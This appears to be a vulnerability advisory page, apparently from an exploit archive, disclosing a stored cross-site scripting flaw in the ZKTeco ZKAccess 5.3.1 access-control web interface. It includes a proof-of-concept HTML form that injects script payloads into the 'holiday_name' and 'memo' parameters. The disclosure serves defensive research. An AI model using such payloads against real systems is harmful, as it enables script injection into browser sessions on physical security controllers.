ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability

2016.09.01
Credit: Gjoko 'LiquidWorm' Krstic
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

i>>?<!-- ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd Product web page: http://www.zkteco.com Affected version: 5.3.12252 Summary: ZKAccess Systems are built on flexible, open technology to provide management, real-time monitoring, and control of your access control system-all from a browser, with no additional software to install. Our secure Web-hosted infrastructure and centralized online administration reduce your IT costs and allow you to easily manage all of your access points in a single location. C3-100's versatile design features take care of present and future needs with ease and efficiency. It is one of the most rugged and reliable controllers on the market, with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000 cardholders. Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: CherryPy/3.1.0beta3 WSGI Server Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016 Python 2.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5368 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php 18.07.2016 --> <html> <body> <form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST"> <input type="hidden" name="pk" value="None" /> <input type="hidden" name="holiday&#95;name" value="&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" /> <input type="hidden" name="holiday&#95;type" value="1" /> <input type="hidden" name="start&#95;date" value="09&#47;13&#47;2016" /> <input type="hidden" name="end&#95;date" value="10&#47;18&#47;2016" /> <input type="hidden" name="loop&#95;by&#95;year" value="2" /> <input type="hidden" name="memo" value="&quot;&gt;&lt;script&gt;alert&#40;2&#41;&lt;&#47;script&gt;" /> <input type="submit" value="Submit request" /> </form> </body> </html>

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top